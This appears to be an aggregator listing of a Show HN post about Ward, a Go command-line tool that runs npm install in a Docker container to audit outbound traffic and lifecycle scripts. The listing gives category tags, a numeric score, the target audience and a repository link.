Show HN: New NPM Supplychain Attack?

Category: security

Tags: npm, supply-chain, docker, security-audit, cli

Score: 6.0/10 (Innovation: 5, Technical: 6, Documentation: 7, Utility: 6)

Ward is a Go CLI tool that runs npm install inside a Docker container to audit outbound network traffic and lifecycle scripts, providing a security summary before copying node_modules to the host. Its combination of container isolation with network traffic analysis for npm installs addresses a real supply chain security gap in a practical way.

Target audience: backend devs, devops, security engineers

Repository: https://github.com/AdamGonda/ward · Go · MIT

View on Hacker News